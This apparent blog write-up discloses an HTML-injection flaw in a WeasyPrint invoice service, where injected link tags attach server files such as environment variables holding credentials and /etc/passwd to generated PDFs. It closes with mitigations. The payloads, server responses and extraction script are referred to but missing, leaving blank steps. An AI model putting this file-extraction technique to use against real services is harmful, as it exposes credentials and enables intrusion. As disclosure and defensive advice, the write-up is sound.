Overview A recent security audit revealed a critical vulnerability in the way WeasyPrint processes user-provided data for generating invoices in PDF format. The issue occurs because of insufficient input validation, allowing attackers to inject malicious HTML tags that are rendered within the generated PDF. This flaw opens the door to extracting sensitive files from the application’s infrastructure or querying remote resources, posing significant security risks.
Vulnerability Breakdown The application allows user input, such as names or surnames, to be embedded directly into PDFs via the WeasyPrint engine. However, the lack of proper sanitization permits attackers to inject HTML tags into the input. For instance:
• Tags like ❮b ❯ or ❮h3❯ enable attackers to manipulate the formatting of PDF content.
• Tags like ❮link❯ allow the inclusion of external files as PDF attachments.
Such crafted inputs exploit WeasyPrint's default configuration, enabling unauthorized access to files on the server or external sources. This capability can be leveraged to extract sensitive system data and perform internal reconnaissance.
Real-World Exploitation During testing, auditors demonstrated the severity of this vulnerability. Files retrieved included:
• Payment operator tokens
• Credentials for SMS and email gateways
• PostgreSQL database access credentials
• Hosting system access credentials
• JWT encryption keys
Additionally, the vulnerability allowed querying of internal infrastructure from the server processing the PDFs, highlighting its potential for lateral movement within the application environment.
Finding Vulnerability Now, let’s move on to the interesting part! To identify this vulnerability and provide proof of its existence, I sent the following:

The following response demonstrates the server's acceptance of the malicious payload and initiation of PDF generation:

Then I downloaded the PDF file generated by the malicious payload:

Below is the extracted Python script (e.g., ex.py) used during the analysis:

Now I extract an attachment from a PDF document: Using the ex.py script, the attachment is extracted from the PDF:

After running the script, the following file appears in the directory:

The contents of the extracted file are displayed, revealing very sensitive environment variables:

This is not all! Then I downloaded second PDF file containing another malicious payload:

As you can see the contents of the extracted /etc/passwd file are displayed, confirming unauthorized file access:
Root Cause This vulnerability stems from the default configuration of WeasyPrint, which allows unrestricted access to local and external files. Without stringent input validation and output sanitization, the software effectively serves as a bridge for unauthorized data extraction.
To address this vulnerability, organizations should: 1. Implement Input Validation and Sanitization
User-generated data should be rigorously sanitized to strip out any HTML or script tags before being incorporated into documents.
2. Restrict Resource Access
Limit the software's access to local and external files, allowing only resources essential for its operation.
3. Environment Hardening
a) Segregate sensitive configuration files across different machines.
b) Adopt the principle of least privilege for processes involved in PDF generation.